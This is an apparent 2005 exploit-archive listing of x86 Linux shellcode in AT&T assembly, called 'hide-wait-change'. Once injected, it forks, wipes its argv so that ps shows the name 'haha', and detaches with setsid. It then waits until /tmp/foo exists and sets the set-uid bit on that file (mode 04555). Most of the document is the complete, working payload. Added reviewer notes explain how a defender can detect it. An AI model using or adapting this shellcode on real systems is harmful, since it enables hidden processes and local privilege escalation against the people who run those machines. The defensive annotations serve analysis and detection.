
linux/x86 examples of long-term payloads hide-wait-change (.s)


linux/x86 long-term payload shellcode


                                                #=============================================================================================#
# hide-wait-change (final v4)                                                                 #
# ------------------------------------------------------------------------------------------- #
#      Author: xort ([email protected])                                                     #
#        Date: 09/14/2005 3:35pm                                                              # 
#        Type: shellcode/(x86-linux).s,   (at&t)                                              #
#        Size: strlen(fake-proc-name) + strlen(file-to-change) + 187                          #
# Description: This is a shellcode that will infect a process, play some argv[0] games among  #
#              other tricks to hide itself from 'ps', and waits until the creation of a       #
#              specified file. Once this file is found to exist, its permissions are changed  #
#              to 04555. Original concept conceived by izik.                                  #
###############################################################################################

.section .text

	.global _start

        ###################################################################################
        ## Reviewer notes (defender's reading of the listing; syntax is AT&T, i386     ##
        ## Linux, int 0x80 with the call number in eax):                                 ##
        ##                                                                               ##
        ##  * System calls visible below, in order: fork (2), exit (1) in the parent,    ##
        ##    open (5) + read (3) on "/proc/self/stat", setsid (66), then a polling      ##
        ##    loop the author documents as nanosleep / access, ending in chmod (15)      ##
        ##    with mode 0x96d (= 04555 octal, i.e. the set-uid bit) on 'filename'.       ##
        ##  * Only the argv memory of the surviving child is rewritten (rep stosb /      ##
        ##    rep movsb). Nothing here touches /proc/<pid>/comm or /proc/<pid>/exe, so   ##
        ##    a cmdline (presumably "haha", see replace_string) that disagrees with      ##
        ##    exe/comm is the observable anomaly for any tool that reads more than argv. ##
        ##  * The 0xff terminators of the .ascii strings are patched to 0x00 at run      ##
        ##    time (incb), i.e. the payload writes into its own code bytes: it needs a   ##
        ##    writable+executable mapping and is stopped by W^X / NX enforcement.        ##
        ##  * End effect is a set-uid bit on a file under /tmp that any local user       ##
        ##    could create; auditing chmod()/fchmodat() calls that set S_ISUID (or       ##
        ##    watching for new set-uid files in world-writable directories) is the       ##
        ##    relevant detection. The delay loop makes the write land minutes after      ##
        ##    the injection, so correlate on pid/sid rather than on time.                ##
        ##                                                                               ##
        ###################################################################################

        ###################################################################################
        ##                                                                               ##
        ## _start: 1) fork() a new process                                               ##
        ##         2) check to see if we are child process                               ##
        ##         3) if we are then _exit()                                             ##
        ##                                                                               ##
        ###################################################################################


	_start:


	      #-------------------------------------------#
	      # we start with a fork()                    #
	      #-------------------------------------------#
                 
	      push $0x02
              pop %eax	
              int $0x80
		
                
	      #-------------------------------------------#
	      # child or parent?                          #
	      #-------------------------------------------#
		
	      test %eax, %eax
	      je proc_name                  # child (eax == 0) continues; it outlives the parent
	

	      #-------------------------------------------#
	      # parent goes exit()                        #
	      #-------------------------------------------#

	      push $0x01
              pop %eax 
	      int $0x80  
             

        ###################################################################################
        ##                                                                               ##
        ##         1) get address of "/proc/self/stat" and fix null@end                  ##
        ##         2) open() "/proc/self/stat"                                           ##
        ##         3) read in 250 bytes from file                                        ##
        ##                                                                               ##
        ###################################################################################


              #-------------------------------------------#             
              # grab "/proc" string location              #
              #-------------------------------------------#

 ret_w_proc:  pop %ebx                  # ebx = address of the string table (pushed by call in proc_name)
              lea 0x10(%ebx), %esi      # esi = replace_string (16 bytes past "/proc/self/stat")

              #-------------------------------------------#
	      # fix "/proc" string to include c-string    #
	      # terminator                                #
	      #-------------------------------------------#
	      
              incb 0xf(%ebx)            # 0xff -> 0x00: writes into the code/data bytes themselves


	###################################################################################
        ##                                                                               ##
        ## Open "/proc/self/stat" and read in 250 bytes                                  ##
        ##                                                                               ##
        ###################################################################################


              #-------------------------------------------#
	      # open() the file                           #
	      #-------------------------------------------#
	      
	      cdq 
	      xor %ecx, %ecx
              movb $0x5, %al
              int $0x80
	      	      

	      #------------------------------------------#
	      # read() 250-bytes from the file into      #
	      # ESP-250                                  #
	      #------------------------------------------#
	      
	      xchg %eax, %ebx # store fd-pointer in ebx
	      push $0x3
              pop %eax
	      movb $250, %dl      
	      mov %esp, %ecx              
	      sub %edx, %ecx
              int $0x80  
	      
	      mov %ecx, %edi            # edi = buffer + bytes read (end of the stat text)
              add %eax, %edi
	      

	###################################################################################
        ##                                                                               ##
        ##      1) Get location of pointer to argv[0] from file (NF-13)                  ## 
        ##      2) Convert it to binary                                                  ##
        ##      3) use that to find real argv[0]s location                               ##
        ##      4) null-out all args with 0x0                                            ##
        ##                                                                               ##
	###################################################################################


	      #------------------------------------------#
	      # scan for the decimal-string of the       #
	      # location of argc & argv[0]               #
	      #------------------------------------------#	      
	      
	      xchg %eax, %ebx
	      
              std                       # scan backwards from the end of the buffer
	      push $0x20
              pop %eax
	      push $14
              pop %ecx
	     
  findargs:
              xchg %ecx, %ebx      
	      repne scasb               # skip one space-separated field per outer iteration
	      xchg %ecx, %ebx
	      loop findargs
	      inc %edi
	      inc %edi
	      

	      #------------------------------------------#
	      # translate string into a real number to   #
	      # obtain pointer.                          #
	      #------------------------------------------#

              xor %eax, %eax
	      push $10
              pop %ebx
              cld 

 calcloop: 
              xor %edx, %edx
              movb (%edi), %cl
              subl $0x30, %ecx          # ASCII digit -> value
              addl %ecx, %eax
              inc %edi
              cmpb $0x20, (%edi) 
              je done_gotnum
              mul %ebx                  # eax = eax * 10 (edx clobbered)
              jmp calcloop 


              #------------------------------------------#
              # once we have the location in memory of   #
              # pointers to argc,argv[0-?], and envp,    #
              # extract the location of argv[0]          #
              #------------------------------------------#

 done_gotnum:
              xchg %eax, %esp           # temporarily point esp at the parsed address to pop through it
	      pop %edi          
	      pop %edi
	      xchg %eax, %esp


              #------------------------------------------#
              # write 255 null characters past argv[0]   #
              # to overwrite it and any other args so ps #
              # won't see them later                     #
              #------------------------------------------#

              push %edi
              movb $0xff, %cl
              xor %eax, %eax
              rep stosb                 # argv memory is zeroed in place; comm/exe are untouched
              pop %edi



	###################################################################################
        ##                                                                               ##
        ##      1) Get location of string we are going to copy over argv[0] and fix      ## 
        ##         null@end.                                                             ##
        ##      2) Call setsid() to establish us as a process leader.                    ##
        ##      3) Jump over strings into shellcode.                                     ##
        ##                                                                               ##
	###################################################################################


              #------------------------------------------#
              # Get string location, fix nullchar and    #
              # copy over argv[0],                       #
              #------------------------------------------#


              push %esi
              dec %esi
 findend:
              inc %esi
              inc %ecx                  # ecx counts the bytes to copy (ends at the 0xff mark)
              cmpb $0xff, (%esi)
              jne findend

              incb (%esi)               # second run-time patch of a string terminator
              pop %esi               
	      rep movsb                 # new argv[0] text is now what /proc/<pid>/cmdline shows


              #------------------------------------------#
              # Call setsid() to establish us as a       #
              # process leader.                          #
              #------------------------------------------#

              movb $66, %al             # setsid: new session, no controlling terminal
              int $0x80

              mov %esi, %edi
              xchg %eax, %edx

              dec %eax
              mov %eax, %ecx 
              repne scasb
               
              incb -1(%edi)             # third run-time patch (terminator of 'filename')


              #------------------------------------------#
              # Jump over strings into shellcode         #
              #------------------------------------------#

              jmp *%edi                 # indirect jump to the code placed after the string table


	###################################################################################
        ##     STRINGS                                                                   ##
	###################################################################################


	proc_name:
		call ret_w_proc
		.ascii "/proc/self/stat\xff"
	
   replace_string:
		.ascii "haha\xff"

         filename:
                .ascii "/tmp/foo\xff"


	###################################################################################
        #                                                                                 #
        # SHELLCODE                                                                       #
        #          1) call nanosleep(60)                                                  #
        #          2) check to see if FILENAME exist w/ access()                          #
        #          3) if it does, then chmod 04555 FILENAME and exit                      #
        #          4) _exit()                                                             #
        #                                                                                 #
	###################################################################################

       shellcode:
                push $60                # seconds field of the timespec built on the stack

    checkforfile:
                inc %eax

              #------------------------------------------#
              # nanosleep(%edi)                          #
              #------------------------------------------#
                mov %esp, %ecx
                mov %esp, %ecx
                mov %esp, %ebx
                xorb $0xa2, %al         # syscall number is formed by xor against the previous eax
                int $0x80


              #------------------------------------------#
              # access((%esi),0)                         #
              #------------------------------------------#

                xor %ecx, %ecx
                mov %esi, %ebx
                xorb $0x21, %al
                int $0x80

                test %eax, %eax
                jne checkforfile        # keep polling until the path exists


              #------------------------------------------#
              # chmod((%esi),04555)                      #
              #------------------------------------------#

                movb $0xf, %al
                movw $0x96d, %cx        # 0x96d == 04555: set-uid bit on 'filename'
                int $0x80 


              #------------------------------------------#
              # _exit()                                  #
              #------------------------------------------#

                inc %eax
                int $0x80 


# milw0rm.com [2005-09-09]
                              
